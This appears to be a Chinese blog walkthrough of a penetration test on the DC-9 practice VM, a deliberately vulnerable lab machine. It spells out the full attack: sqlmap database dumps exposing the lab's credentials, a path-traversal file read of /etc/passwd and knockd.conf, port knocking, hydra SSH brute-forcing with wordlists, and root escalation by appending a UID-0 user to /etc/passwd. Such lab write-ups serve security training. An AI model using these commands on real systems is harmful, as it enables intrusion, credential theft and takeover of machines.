DC9靶机渗透测试
文章目錄
- 一、信息收集
- 1.主機發現
- 2.端口掃描
- 二、漏洞挖掘
- 1.訪問靶機 web 服務
- 2.使用 SQLmap 進行信息收集
- 三、提權
- 1.使用 sudo 查看可以 root 權限執行的文件
- 2.逐層進入并查看該目錄
環境版本:
- VMware pro 16
- Kali 2021.1(虛擬機)
- DC-9(虛擬機)
一、信息收集
1.主機發現
arp-scan -l
2.端口掃描
nmap -A -p- 192.168.1.111
開放了 22 ssh,但是狀態為 filtered、80 端口 apache 服務
二、漏洞挖掘
1.訪問靶機 web 服務
在 search 下表單輸入內容提交發現跳轉到 results.php 頁面
在此抓包查看數據包內容
發現在 /results.php 進行了 POST 傳參,參數為 search=1
嘗試使用 sqlmap 進行爆數據
2.使用 SQLmap 進行信息收集
1)爆庫
sqlmap -u http://192.168.1.111/results.php --data 'search=1' --dbs
發現有兩個用戶庫
2)爆 Staff 數據庫表
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff --tables
3)直接爆 User 表內容
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff -T Users --dump
得到 admin 賬號密碼 transorbital1
4)爆 users 庫
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D users --tables
5)爆 UserDetails 表內容
sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D users -T UserDetails --dump
得到若干賬戶密碼,將所有用戶名存到 name.txt 中,密碼存到 passwd.txt 中
3.使用 admin 登入后臺
登入后發現有 File does not exist 字樣,疑似有文件包含
4.嘗試文件包含
http://192.168.1.111/welcome.php?file=../../../../../etc/passwd
發現有本地文件包含(LFI)
5.利用 LFI 查看 /etc/knockd.conf 文件內容
結合 22 端口 ssh 服務狀態未知
嘗試查看對方是否開啟了 knockd (端口敲門)服務
knochd 服務:
在使用此服務時,他人訪問你的端口會顯示 close 狀態,只有按照特定順序(配置文件)訪問規定端口后才會開放被訪問的端口,依次訪問特定端口后才會關閉被訪問的端口
http://192.168.1.111/welcome.php?file=../../../../../etc/knockd.conf
6.開啟 22 端口
依次訪問 7469,8475,9842 端口來開啟 22 端口
for x in 7469 8475 9842;do nmap -p $x 192.168.1.111;done
查看靶機端口狀態
nmap 192.168.1.111
7.使用 hydra 進行 ssh 爆破
name.txt:
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
admin
passwd.txt:
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
transorbital1
hydra -L ./name.txt -P ./passwd.txt 192.168.1.111 ssh -t 30
8.使用賬號登陸 ssh 進行信息收集
登陸 janitor 賬號, 查找隱藏文件
ls -al
發現備份密碼,將其寫入 passwd.txt 中
再次使用 hydra
hydra -L ./name.txt -P ./passwd.txt 192.168.1.111 ssh -t 30
得到新用戶 fredf B4-Tru3-001
三、提權
1.使用 sudo 查看可以 root 權限執行的文件
sudo -l
發現 /opt/devstuff/dist/test/test 可以無需密碼以 root 權限執行
2.逐層進入并查看該目錄
發現 test.py 判斷其是一個 python 文件,使用 cat 打印其中內容:
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$
可以看到該腳本是判斷參數是否為 3 個,如果是 3 個,將第二個文件中內容讀出,寫到第三個文件末尾
3.構造 root 權限用戶
因為我們可以以 root 權限執行該腳本,所以我們嘗試構造數據進行對 /etc/passwd 進行添加
openssl passwd -1 -salt toor 123456 #構造toor用戶密碼為123456的hash
toor:111toor$9mBAQXqhpCXpTk7V6d/kI0:0:0:root:/root:/bin/bash
echo 'toor:$1$toor$9mBAQXqhpCXpTk7V6d/kI0:0:0:root:/root:/bin/bash'>/tmp/a
#將其寫入/tmp/a文件中
cd /opt/devstuff/dist/test #進入腳本路徑
sudo ./test /tmp/a /etc/passwd #使用腳本
su toor #切換用戶
123456
總結
- 上一篇: DC8靶机渗透测试
- 下一篇: Kali2021.2 VMware最新版